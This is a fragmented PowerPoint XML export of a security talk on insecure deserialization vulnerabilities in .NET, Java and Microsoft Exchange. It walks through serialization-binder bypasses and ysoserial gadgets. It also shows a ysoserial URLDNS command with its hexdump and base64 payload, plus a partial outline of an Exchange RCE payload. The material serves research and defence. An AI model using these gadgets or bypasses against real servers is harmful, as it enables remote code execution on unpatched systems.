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0" r:id="rId6"/>
    <p:sldId id="330" r:id="rId7"/>
    <p:sldId id="331" r:id="rId8"/>
    <p:sldId id="372" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="266" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="340" r:id="rId21"/>
    <p:sldId id="341" r:id="rId22"/>
    <p:sldId id="348" r:id="rId23"/>
    <p:sldId id="333" r:id="rId24"/>
    <p:sldId id="345" r:id="rId25"/>
    <p:sldId id="346" r:id="rId26"/>
    <p:sldId id="347" r:id="rId27"/>
    <p:sldId id="349" r:id="rId28"/>
    <p:sldId id="350" r:id="rId29"/>
    <p:sldId id="363" r:id="rId30"/>
    <p:sldId id="351" r:id="rId31"/>
    <p:sldId id="352" r:id="rId32"/>
    <p:sldId id="353" r:id="rId33"/>
    <p:sldId id="354" r:id="rId34"/>
    <p:sldId id="355" r:id="rId35"/>
    <p:sldId id="356" r:id="rId36"/>
    <p:sldId id="376" r:id="rId37"/>
    <p:sldId id="342" r:id="rId38"/>
    <p:sldId id="343" r:id="rId39"/>
    <p:sldId id="357" r:id="rId40"/>
    <p:sldId id="358" r:id="rId41"/>
    <p:sldId id="359" r:id="rId42"/>
    <p:sldId id="360" r:id="rId43"/>
    <p:sldId id="361" r:id="rId44"/>
    <p:sldId id="362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5" r:id="rId54"/>
    <p:sldId id="339" r:id="rId55"/>
    <p:sldId id="332" r:id="rId56"/>
    <p:sldId id="273" r:id="rId57"/>
    <p:sldId id="334" r:id="rId58"/>
    <p:sldId id="274" r:id="rId59"/>
    <p:sldId id="275" r:id="rId60"/>
    <p:sldId id="276" r:id="rId61"/>
    <p:sldId id="277" r:id="rId62"/>
    <p:sldId id="278" r:id="rId63"/>
    <p:sldId id="280" r:id="rId64"/>
    <p:sldId id="281" r:id="rId65"/>
    <p:sldId id="311" r:id="rId66"/>
    <p:sldId id="312" r:id="rId67"/>
    <p:sldId id="314" r:id="rId68"/>
    <p:sldId id="315" r:id="rId69"/>
    <p:sldId id="313" r:id="rId70"/>
    <p:sldId id="279" r:id="rId71"/>
    <p:sldId id="282" r:id="rId72"/>
    <p:sldId id="335" r:id="rId73"/>
    <p:sldId id="283" r:id="rId74"/>
    <p:sldId id="284" r:id="rId75"/>
    <p:sldId id="291" r:id="rId76"/>
    <p:sldId id="286" r:id="rId77"/>
    <p:sldId id="285" r:id="rId78"/>
    <p:sldId id="287" r:id="rId79"/>
    <p:sldId id="288" r:id="rId80"/>
    <p:sldId id="289" r:id="rId81"/>
    <p:sldId id="290" r:id="rId82"/>
    <p:sldId id="292" r:id="rId83"/>
    <p:sldId id="336" r:id="rId84"/>
    <p:sldId id="293" r:id="rId85"/>
    <p:sldId id="294" r:id="rId86"/>
    <p:sldId id="295" r:id="rId87"/>
    <p:sldId id="305" r:id="rId88"/>
    <p:sldId id="306" r:id="rId89"/>
    <p:sldId id="296" r:id="rId90"/>
    <p:sldId id="298" r:id="rId91"/>
    <p:sldId id="297" r:id="rId92"/>
    <p:sldId id="299" r:id="rId93"/>
    <p:sldId id="300" r:id="rId94"/>
    <p:sldId id="301" r:id="rId95"/>
    <p:sldId id="302" r:id="rId96"/>
    <p:sldId id="303" r:id="rId97"/>
    <p:sldId id="304" r:id="rId98"/>
    <p:sldId id="307" r:id="rId99"/>
    <p:sldId id="308" r:id="rId100"/>
    <p:sldId id="309" r:id="rId101"/>
    <p:sldId id="337" r:id="rId102"/>
    <p:sldId id="316" r:id="rId103"/>
    <p:sldId id="338" r:id="rId104"/>
    <p:sldId id="318" r:id="rId105"/>
    <p:sldId id="319" r:id="rId106"/>
    <p:sldId id="320" r:id="rId107"/>
    <p:sldId id="317" r:id="rId108"/>
    <p:sldId id="321" r:id="rId109"/>
    <p:sldId id="322" r:id="rId110"/>
    <p:sldId id="323" r:id="rId111"/>
    <p:sldId id="324" r:id="rId112"/>
    <p:sldId id="325" r:id="rId113"/>
    <p:sldId id="326" r:id="rId114"/>
    <p:sldId id="327" r:id="rId115"/>
    <p:sldId id="328" r:id="rId116"/>
    <p:sldId id="344" r:id="rId117"/>
    <p:sldId id="329" r:id="rId118"/>
    <p:sldId id="373" r:id="rId119"/>
    <p:sldId id="310" r:id="rId120"/>
    <p:sldId id="374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5A076E-2B19-9471-ED14-6A42C819B694}" name="Guy Lederfein (TR-CA)" initials="GL(C" userId="S::guy_lederfein@trendmicro.com::588c78af-3af7-4ca1-835b-c45935a433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CFB7-66CA-484B-938F-1B60126F2DD5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31A24-B00D-41E6-A230-9456DBF09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44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Impact can range from information disclosure, privilege escalation, to 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490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hashCode on handler of URL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79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getHostAddress on URL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24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resolve the host, a DNS query is made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99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Newen ten zan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103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Popular library for deserializing JSON input in .NET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69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53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Obfuscated code – calls DeserializeObjectWithTypes with type set to ActionContextBase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64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TypeNameHandling set to TypeNameHandling.Objects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a blacklist binder is set. Then, Json.NET’s deserializer is called with the specified type (ActionContextBase).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67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a blacklist binder is set. Then, Json.NET’s deserializer is called with the specified type (ActionContextBase).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22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/>
              <a:t>CommonsCollections7 gadget from ysoserial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/>
              <a:t>Relies on the popular Apache Commons library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157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List of missing known deserialization gadgets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71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AlertingActionContext inherits from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ActionContextBase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933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Calls LoadJsonData on input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JavaScriptSerializer is a safe deserializer, as long as a type resolver isn’t specified (default).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>That would be too easy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911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 the “Control” parameter from the request and call LoadControl(). Then ApplyPropertiesAndAttributes() on it.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713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Load the control from a path specified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86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SetProperties with the JsonData provided in the “config” key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766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SetProperty() on each property in JsonData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292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get a property of the TemplateControl object and set a value for it.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793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ActionPluginBaseView &lt; ActionBaseView &lt; UserControl &lt; Template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2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dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Useful for testing insecure deserialization exists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42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890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name handling is used and no SerializationBinder is defined.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916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362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strictMode parameter is set to false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54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ChainedSerializationBinder is called with strictmode = false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368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BindToType() function of the serialization binder is called, which calls ValidateTypeToDeserialize()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994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Flag is only enabled if type is in disallowed types list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Otherwise, BlockedDeserializeTypeException may be sent, but will be caught and not thrown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965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Typo in class name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052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deserialization gadget, added to ysoserial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Based on ClaimsIdentity gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DeserializeIdentities() is called on property in our control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1275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Performs Base64 decoding and deserializes result using BinaryFormatter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00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ACED signature in beginning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2398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1 of call stack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962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2 of call stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Notice origin is from a call to GetClientAccessToken operation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1937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UserConfiguration is retrieved and deserialized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444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UserConfiguration is retrieved and deserialized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7974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 1 of call stack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423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Path from ImportCertificate call to DeserializeObject()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9291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strictMode is obtained from GetStrictModeStatus()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Then, CreateBinaryFormatter is called with that status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6704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before, ChainedSerializationBinder is called with that mode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076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determine strictMode, settings are checked for strict mode enabled, disabled locations, learning locations, and enable locations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040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ExchangeCertificateRpc not in EnableStrictLocation list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773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program to test deserialization of example gadget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6102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perform NTLM relay if SMB signing is disabled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178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Calling DirectoryInfo contructor with UNC path can result in NTLM request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537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more EnableStrictLocation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59565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Strict mode enabled for most code paths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988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Previously we looked at ValidateTypeToDeserialize()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Now lets look at the type resolving process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>InternalBindToType calls InternalBindToType, which calls LoadType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632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Attempt to resolve type from type name and assembly name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attempt to resolve type from type name and loaded assemblies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Will return null if no type was found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205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TypeName format is defined in MS-NRTP Open Specification section 2.2.1.2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9101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LibraryName format is defined in MS-NRTP section 2.2.1.3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83350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type name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121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Definition of library name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942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calling readObject on HashMap, we eventually trigger a DNS query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3769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AQN is split to Type Name and Assembly Name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3952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Calling the SerializationBinder with a BinaryFormatter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38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BindToType of SerializationBinder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If null type is returned, call FastBindToType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5777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Resolve assembly name, then call GetSimplyNamedTypeFromAssembly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9488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set typeName to the AQN, we will get the type resolved, regardless of assembly name sent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492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set typeName to the AQN, we will get the type resolved, regardless of assembly name sent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6522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Validation is skipped and null type is returned from BindToType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204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BindToType returns null without preforming validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FastBindToType resolves type containing AQN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5929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to run PowerShell commands on exchange server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9544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PowerShell object is read, its type is retrieved from the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA">
                <a:solidFill>
                  <a:srgbClr val="D69D85"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>TargetTypeForDeserialization” field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:solidFill>
                  <a:srgbClr val="D69D85"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Can we control this type?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108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keys and values of each item in Hashmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Call hash() on key object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82365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SerializationTypeConverter is used for deserializing some allowed types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4081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We’re calling CreateBinaryFormatter with our list of allowed types and strict mode (set to true)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2151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We’ve already seen this code, creating a BinaryFormatter with the ChainedSerializationBinder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7269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UnitySerializationHolder is in the list of allowed types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075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class can be assigned to a Type class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2666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we can control the target type, ConvertTo() is called on our controlled object and type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7823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Get the Parse method of our controlled type with a string input under our control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4073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Exception uses SerializationTypeConverter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909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as PSObject gadget in ysoserial.net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0481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SerializationData is a base64 encoded serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>System.UnitySerializationHolder object which deserializes to the XamlReader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453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is a URL object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9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hashCode() on URL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31A24-B00D-41E6-A230-9456DBF09EC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0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D05D-4D4D-87E6-A3FE-F586A5DED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598E-4F10-695F-69C7-9938E966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21A3-0BA0-5D8D-17BC-5A72B969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ADC3F-C0A1-9FA1-6D47-377D0044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B042-652C-9FAA-6935-FF25B290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48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23FD-4CDA-B0F7-67D3-448A5F13E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298F1-5B88-CA3F-A755-6CA689888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7C40-D3F7-DC86-3C3F-1B63C283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64A4-43E9-1FF9-63CE-C3757A0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C0693-546E-5650-B2FA-5E9B31D4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1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A918B-1C54-FA5F-B728-6AEAFB71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91F79-2361-3583-CEB4-6B52E7365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E830-0E9E-B385-CEE6-8B7F2BA1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EA36-D11C-8836-FD18-7FDD525B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60F9-98B7-E82A-7C4C-E1F75AAF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8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BC8-C416-CF39-3846-8F0D1FD2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22E9-8635-1AA3-7AE0-E350AF00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DFD00-7E0E-214C-CD54-0CF18113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6DCD-12E4-52CD-CCAE-FBC17CFC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300B-760D-F7C1-0410-B289B4CE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5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159-93A2-CA6A-629C-57A215CE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9FED-51C9-46D8-E72D-346EC415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6E32-F2D1-61EE-AAB3-07C74AF2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027F-E41F-CA4C-0E60-A9F0FD62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C113-8087-EC40-3DD1-17B99CA0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94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412A-9E84-51B1-1B27-E66DF11D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9603-3231-FF11-0C68-7A98EE8A3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E8E7-80BD-1698-A6BE-35306D0F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AD837-8E11-2FE3-81F5-F5B7C16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A117-3C86-0B80-6908-587D2052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CB4F6-2737-BA4D-CA2F-C95AB433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66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8CED-DB0A-7790-FC1D-D47B4DCF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D90DC-E4E3-F3BF-6A86-690DF8B1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F6A6-AE94-17C6-0653-2AABA002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00AF4-6863-A7ED-066B-C556EE613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79867-84E4-48DD-4594-01C7538D4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CF5B5-1B38-8A40-BB0A-9B88B5EE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F2EBB-47A8-3F0A-56CF-5B2A7A22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EC31-E222-706E-F7BB-D2FCE2A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38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DA3F-C308-E56B-A33D-B68D5F1D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095B-0ED3-97FA-8E6C-D68A4FBD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BDA46-030D-7747-0BEC-C285ABC2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7D772-DD3D-6CCD-859E-4F793497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7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4C405-5CFA-7D86-EDBE-4CE55F5F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1E521-EE82-722F-EA34-C2557F85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C1A1A-1008-B762-D0A2-62EEF595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83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56FA-3A24-DE72-5BBB-66DCB5B0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EB6E-7821-B07B-D6C8-9B4D91E4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ACC94-A002-E679-95C1-C494B7D8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7E71-8CBC-62D5-8967-0E2B2F02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2B00-7150-D2F7-5A6B-EE51F0B1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84FF-C1CB-6556-A8B3-A9541937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64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5040-82C0-B7CA-3C2A-2F0496AD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0F825-FFE4-07FF-9EBB-25AB18E2F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01D03-FAD9-3566-B6DA-78425B2DB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D48E7-643B-FE20-0F32-0591C76B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0BE2F-091D-8ADF-AF05-AC09472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891A5-A85A-277D-F6AA-EFFC4C44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5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72D5D-B5D6-CA7A-F1A8-DB32A16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F1D9-52D5-E4BA-228E-7D882B47A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620A-F9B6-6A77-915A-E9769CF1A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89F5-F7D3-4778-9567-14805F60A89B}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-01-03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EF3D-38AA-3325-946A-BBDF38F52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544D-0DB4-D212-300B-D9D0E599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C81E-63F7-4132-ADBC-3BC0B22A69E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4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ackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec.vnpt.vn/2021/10/50-shades-of-solarwinds-orion-deserialization-part-1-cve-2021-35215/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec.vnpt.vn/2021/05/phan-tich-lo-hong-solarwinds-orion-deserialization-to-rce-cve-2021-314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whitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@frycos/searching-for-deserialization-protection-bypasses-in-microsoft-exchange-cve-2022-21969-bfa38f63a62d" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.ne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echler/marshalsec" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/frohoff/ysose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bionics/phpggc" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.net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07B7-59C3-7BE5-15FC-3D026076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74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The Current State of Insecure Deserialization Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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6FD603A-A893-648F-1574-65064271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4146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/>
              <a:t>Guy Lederfein</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="320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6F3051-911A-7C0E-2978-9C732117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81" y="1146193"/>
            <a:ext cx="3048006" cy="10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8B340-7418-7633-7E6B-CDFC6DC1859F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325730" y="1449383"/>
            <a:ext cx="1088253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java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS https://owasp.org/ | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="160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endParaRPr lang="en-CA" sz="160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00000000: aced 0005 7372 0011 6a61 7661 2e75 7469  ....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java.uti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00000010: 6c2e 4861 7368 4d61 7005 07da c1c3 1660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l.HashMap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......`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00000020: d103 0002 4600 0a6c 6f61 6446 6163 746f  ....F..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loadFacto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00000030: 7249 0009 7468 7265 7368 6f6c 6478 703f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thresholdxp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00000040: 4000 0000 0000 0c77 0800 0000 1000 0000  @......w........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00000050: 0173 7200 0c6a 6176 612e 6e65 742e 5552  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sr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java.net.UR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00000060: 4c96 2537 361a fce4 7203 0007 4900 0868  L.%76...r...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I..h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00000070: 6173 6843 6f64 6549 0004 706f 7274 4c00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ashCodeI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portL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00000080: 0961 7574 686f 7269 7479 7400 124c 6a61  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authorityt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Lja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00000090: 7661 2f6c 616e 672f 5374 7269 6e67 3b4c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/lang/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String;L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000000a0: 0004 6669 6c65 7100 7e00 034c 0004 686f  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fileq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.~..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L..ho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000000b0: 7374 7100 7e00 034c 0008 7072 6f74 6f63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stq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.~..L..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protoc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000000c0: 6f6c 7100 7e00 034c 0003 7265 6671 007e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olq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.~..L..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refq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.~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000000d0: 0003 7870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 7400 096f  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........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t..o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000000e0: 7761 7370 2e6f 7267 7400 012f 7100 7e00  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wasp.orgt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../q.~.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000000f0: 0574 0005 6874 7470 7370 7874 0012 6874  .t..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httpspxt</a:t>
            </a:r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CA" sz="1600" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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00000100: 7470 733a 2f2f 6f77 6173 702e 6f72 672f  tps://owasp.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000110: 78                                       x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15783076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 ObjectReader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9381-243D-459D-ED5E-60002EF9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8357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FastBindToType is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Type is resolved successfully, but validation is skipped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E36AC-7C73-68D2-D2FC-71EC707097DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800793" y="2947244"/>
            <a:ext cx="86400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3671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CVE-2022-23277 -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2225-DD71-5607-F5D7-C6FB5072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BindToType() implemented by SerializationBinder returns null, default binder is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This may result in a bypass of any type validation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09273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CVE-2022-41082 | ZDI-22-1624</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4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D44DE2EA-E102-1EBE-8998-6906B719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22442"/>
            <a:ext cx="3120491" cy="4816866"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42227400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CVE-2022-41082 | ZDI-22-1624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2225-DD71-5607-F5D7-C6FB5072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 err="1"/>
              <a:t>Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q from GTSC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patched in November 2022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4840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8817-34B6-4598-4053-D288FC66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Management Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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F7E1E01-E7FD-ED34-03C6-F0062820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42" y="1825625"/>
            <a:ext cx="8824715" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266186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82C8-8846-7A01-02D5-634EB7FE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[MS-PSRP]: PowerShell Remoting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90D7B-EB1F-50AB-DA3B-24BD3B668DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727363" y="1423704"/>
            <a:ext cx="117001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"RefId-0"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"RefId-0"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System.Drawing.Point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System.ValueType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System.Object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&lt;/TN&gt;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&lt;ToString&gt;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{X=10,Y=20}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&lt;/ToString&gt;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"IsEmpty"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&lt;I32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&lt;/I32&gt;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&lt;I32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&lt;/I32&gt;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"Property1"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 extended property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"Property2"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second extended property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"PropertySet1"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"Property3"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third extended property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"Property4"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forth extended property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&lt;/MS&gt;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705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InternalDeserializer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60B8-F54E-C922-37F7-30A8575BB0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668482" y="1860585"/>
            <a:ext cx="1085503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ReadOneObject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ReadOneDeserializedObject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IsDeserializedInstanceOfType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CimInstance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RehydrateCimInstance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targetTypeForDeserialization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GetTargetTypeForDeserialization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_typeTable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735092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C9BD-2F68-7683-28DF-C257C7D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Type Definitions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>exchange.partial.types.ps1xml)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10CB4-418A-1302-91BE-25589CD04C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="11187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System.Exception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&lt;Members&gt;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&lt;CodeProperty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IsHidden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&lt;Name&gt;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SerializationData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&lt;/Name&gt;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&lt;GetCodeReference&gt;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&lt;TypeName&gt;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Microsoft.Exchange.Data.SerializationTypeConverter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&lt;/TypeName&gt;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&lt;MethodName&gt;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GetSerializationData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&lt;/MethodName&gt;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&lt;/GetCodeReference&gt;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&lt;/CodeProperty&gt;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&lt;/Members&gt;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&lt;TypeConverter&gt;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&lt;TypeName&gt;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Microsoft.Exchange.Data.SerializationTypeConverter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&lt;/TypeName&gt;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&lt;/TypeConverter&gt;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&lt;/Type&gt;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2688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SerializationTypeConverter Class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EB11A-6D19-6CD8-691D-B6E16F5969EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578427" y="2358241"/>
            <a:ext cx="11035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strictModeStatus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GetStrictModeStatus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SerializationTypeConverter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ExchangeBinaryFormatterFactory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SerializationTypeConverter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strictModeStatus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SerializationTypeConverter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SerializationTypeConverter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0448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ExchangeBinaryFormatterFactory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A1BDE-8535-6363-DA4A-995E9768F7D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="2524450"/>
            <a:ext cx="11180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ChainedSerializationBinder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84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62B2F-A604-28DA-377F-C668E9551BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451313" y="1478385"/>
            <a:ext cx="109845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java.io.ByteArrayInputStream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java.io.IOException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java.io.ObjectInputStream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java.util.Base64;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getDecoder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0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QACW93YXNwLm9yZ3QAAS9xAH4ABXQABWh0dHBzcHh0ABJodHRwczovL293YXNwLm9yZy94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ByteArrayInputStream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ByteArrayInputStream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5116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SerializationTypeConverter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8C4C6-420C-CD03-DFC5-B084BF39A1C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644236" y="1779687"/>
            <a:ext cx="89084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"System.ObjectDisposedException"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"System.OrdinalComparer"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"System.OutOfMemoryException"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"System.OverflowException"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"System.Reflection.MemberInfoSerializationHolder"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"System.Runtime.InteropServices.COMException"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"System.Security.Principal.SecurityIdentifier"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"System.Text.Encoding"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"System.UnauthorizedAccessException"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System.UnitySerializationHolder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"System.Uri"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"System.Version"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"System.Xml.XmlException"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639760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95-4004-E596-D660-A15EF65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[MS-NRTP]: .NET Remoting: Core Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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D2494C7B-E035-F288-A828-6A012F01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763"/>
            <a:ext cx="6566237" cy="4108661"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22902047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InternalDeserializer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4EF6D-B85A-E76A-12DD-8D93A963EF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671945" y="2039680"/>
            <a:ext cx="108481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ReadOneObject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streamName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targetTypeForDeserialization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psobject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GetTargetTypeForDeserialization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_typeTable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targetTypeForDeserialization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LanguagePrimitives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ConvertTo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targetTypeForDeserialization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InvariantCulture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_typeTable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9244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7BA-D601-C3A4-2EB6-FB9710E0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CU12 - 15.2.1118.7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>LanguagePrimitives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DA0C1-9282-4B3D-7571-D507A6312EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332508" y="1801524"/>
            <a:ext cx="1179021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LanguagePrimitives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PSConverter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FigureParseConversion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methodInfo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"Parse"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BindingFlags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BindingFlags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BindingFlags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FlattenHierarchy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methodInfo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LanguagePrimitives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PSConverter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LanguagePrimitives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ConvertViaParseMethod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methodInfo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ConvertWithoutCulture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037857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F96-EA7D-98C8-7812-5FE4F6D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RCE Payload – TargetTypeForDeserialization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6E0A-7D60-90CF-3529-7B746988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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>TargetTypeForDeserialization” to “System.Exception” type with “SerializationData” set to crafted “System.UnitySerializationHolder” object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>m_unityType = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>m_assemblyName = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
